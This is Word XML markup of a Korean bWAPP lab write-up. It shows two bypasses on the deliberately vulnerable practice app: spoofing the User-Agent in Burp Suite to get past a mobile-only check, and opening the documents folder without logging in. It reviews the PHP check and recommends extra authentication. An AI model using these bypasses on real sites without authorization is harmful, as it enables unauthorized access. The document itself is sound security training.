            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://developers.whatismybrowser.com/useragents/explore/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68EDB634" w14:textId="0273D158" w:rsidR="00407D54" w:rsidRPr="0035631E" w:rsidRDefault="00407D54" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3032D863" w14:textId="29A42962" w:rsidR="00407D54" w:rsidRPr="0035631E" w:rsidRDefault="00407D54" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D44FCC" w14:textId="01060B9F" w:rsidR="00407D54" w:rsidRPr="0035631E" w:rsidRDefault="00407D54" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF88350" w14:textId="77777777" w:rsidR="00407D54" w:rsidRPr="0035631E" w:rsidRDefault="00407D54" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F55F45A" w14:textId="3771F611" w:rsidR="00407D54" w:rsidRPr="0035631E" w:rsidRDefault="00407D54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49A0EA8E" wp14:editId="45C9F949">
            <wp:extent cx="6840001" cy="2302024"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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30202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2088F0" w14:textId="6A2E5A95" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="00625FE6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U</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ser-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 확보했다면 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하여 i</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ntercept on </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">후 새로고침하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 획득한 모바일 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 바꿔준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1146DEAA" w14:textId="5F09FAF3" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="00625FE6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여기서는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>IOS User-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED2E52" w14:textId="648A780B" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="001925F6" w:rsidP="005846BA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“</w:t>
      </w:r>
      <w:r w:rsidR="00625FE6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54194380" w14:textId="41885EC2" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="00625FE6" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A733FD" w14:textId="482D82E3" w:rsidR="00625FE6" w:rsidRPr="0035631E" w:rsidRDefault="00410397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1D5DD51F" wp14:editId="7A5B3894">
            <wp:extent cx="6840001" cy="2297208"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="273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29720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030F3E" w14:textId="2B115BF6" w:rsidR="00410397" w:rsidRPr="0035631E" w:rsidRDefault="00410397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변조한 패킷을 보내고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페이지를 확인하면 위와 같이 우회에 성공한 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401B5F2" w14:textId="76007830" w:rsidR="00410397" w:rsidRPr="0035631E" w:rsidRDefault="00410397" w:rsidP="005846BA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난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>medium/high</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지에서도 똑같이 우회가 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FCDEA" w14:textId="77777777" w:rsidR="00410397" w:rsidRPr="0035631E" w:rsidRDefault="00410397" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1756C9E7" w14:textId="539FC566" w:rsidR="00410397" w:rsidRPr="0035631E" w:rsidRDefault="00410397" w:rsidP="00410397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비박스 서버</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 내 코드를 확인하여 장치 접근 제어 방식을 확인해보자.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274FE3E6" w14:textId="44FE9203" w:rsidR="00410397" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA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vi</w:t>
      </w:r>
      <w:r w:rsidR="00410397" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/bWAPP/restrict_device_access.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9709A" w14:textId="3E618A01" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF81BD5" w14:textId="591C45AD" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66228D8A" wp14:editId="1C52C75B">
            <wp:extent cx="6840001" cy="6319565"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2413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631956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D377CD" w14:textId="77777777" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF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 xml:space="preserve">위 코드는 난이도 별 적용되는 코드이다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66008962" w14:textId="31F6D198" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF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난이도에 관계없이 check_user_agent() 함수를 호출하는 것을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335173EA" w14:textId="1FA7ED88" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08505021" w14:textId="1018F14B" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A860CD" wp14:editId="0A423B85">
            <wp:extent cx="6840001" cy="5693050"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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569305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82CA61" w14:textId="77777777" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF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 코드는 check_user_agent() 함수 부분이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F191A6" w14:textId="20ED66E3" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF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코드를 보면 접속한 클라이언트의 User-Agent 값을 받아와서 User-Agent 값 안에 "iPhone", "iPad", "iPod", "Android" 문자열이 있는지 확인하여 접근을 허용하고 있는 것을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D2BCD" w14:textId="27001271" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF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처럼 User-Agent를 이용한 접근 제어는 요청 패킷의 헤더 변조만으로 쉽게 우회할 수 있으므로 만약 추가적인 보안조치가 필요하다면 추가 인증 로직을 추가하는 것이 보안 대책이 되겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED8657" w14:textId="48D05164" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="005846BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACF4915" w14:textId="7D33B013" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F6B613" w14:textId="0DB3C368" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445C31B7" w14:textId="1FEC1785" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4EFB38" w14:textId="5D777302" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="006814DF" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A83FDE6" w14:textId="44B04928" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F34CE3" w14:textId="45D973A3" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4235FF85" w14:textId="2C9859D9" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBBAD13" w14:textId="19EBAA8A" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="006814DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28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CA7C4B" w:rsidRPr="0035631E" w14:paraId="1A9EFD6F" w14:textId="77777777" w:rsidTr="008046E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bookmarkStart w:id="15" w:name="G2"/>
          <w:bookmarkEnd w:id="15"/>
          <w:p w14:paraId="19C44BDC" w14:textId="3EFB9BE7" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00A5041C" w:rsidP="00392998">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pP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begin"/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instrText xml:space="preserve"> HYPERLINK  \l "G1" </w:instrTex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separate"/>
            </w:r>
            <w:r w:rsidR="00392998" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0039299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. Restrict F</w:t>
            </w:r>
            <w:r w:rsidR="0039299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o</w:t>
            </w:r>
            <w:r w:rsidR="00392998" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>lder Access</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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CA7C4B" w:rsidRPr="0035631E" w14:paraId="5B583156" w14:textId="77777777" w:rsidTr="008046E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606D4761" w14:textId="77777777" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="008046EE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63357883" w14:textId="44FAA168" w:rsidR="00392998" w:rsidRPr="0035631E" w:rsidRDefault="00392998" w:rsidP="00392998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[Restrict Folder Access </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>공통</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA34B2" w14:textId="76834ECB" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00392998" w:rsidP="006814DF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/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5233125E" wp14:editId="5F011B6A">
            <wp:extent cx="6840001" cy="4415373"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2349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441537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EC5775" w14:textId="77777777" w:rsidR="00F37367" w:rsidRPr="0035631E" w:rsidRDefault="00F37367" w:rsidP="00F37367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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>인증된 사용자만 documents 폴더에 접근할 수 있고,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040BEA3D" w14:textId="77777777" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F37367" w:rsidP="00F769B7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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>로그오프 후에 documents 디렉터리에 있는 해당 파일들에 접근해보라고 하고 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00F769B7" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229378E" w14:textId="5825CF72" w:rsidR="006814DF" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>먼저 링크를 하나 클릭하여 URL을 확인한다.</w:t>
      </w:r>
      <w:r w:rsidR="006814DF" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94257A" w14:textId="776E83B9" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C03835" w14:textId="1A392797" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB099A2" w14:textId="1B02A429" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F60773C" w14:textId="42CB176E" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044EC09D" w14:textId="5C3FFEDB" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C66A3EA" w14:textId="13554F89" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7" w:rsidP="00F769B7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 w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED27A25" wp14:editId="78A40898">
            <wp:extent cx="6840001" cy="3313493"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="203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331349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1FB132" w14:textId="2DFA562D" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7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위 페이지의 URL은 "비박스IP/bWAPP/documents/Terminator_Salvation.pdf”이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E7A60" w14:textId="77777777" w:rsidR="00522065" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7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 xml:space="preserve">이제 로그오프 후에 위 URL로 접속하면 별다른 인증 없이 접근이 가능한 것을 확인할 수 있고 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DDD41" w14:textId="77777777" w:rsidR="00522065" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7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아래 주소로 접근도 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D3909" w14:textId="17E5A039" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00F769B7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"비박스</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>P/bWAPP/documents/”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F406753" w14:textId="77777777" w:rsidR="00003A8E" w:rsidRPr="0035631E" w:rsidRDefault="00003A8E" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD90446" w14:textId="0F25F2B4" w:rsidR="00F769B7" w:rsidRPr="0035631E" w:rsidRDefault="00003A8E" w:rsidP="00F769B7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/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DDC8C60" wp14:editId="35CE3E80">
            <wp:extent cx="6840001" cy="2801093"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="184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801093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405075" w14:textId="77777777" w:rsidR="00003A8E" w:rsidRPr="0035631E" w:rsidRDefault="00003A8E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해당 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지의 URL로 접근을 시도하면 로그인 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지가 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">출력되어 접근이 불가능하지만 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286A96F" w14:textId="5B5859E9" w:rsidR="00003A8E" w:rsidRPr="0035631E" w:rsidRDefault="00003A8E" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>documents 디렉터리에 대해서는 인증이 미비하여 로그인 없이도 접근 가능한 것을 확인할 수 있다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
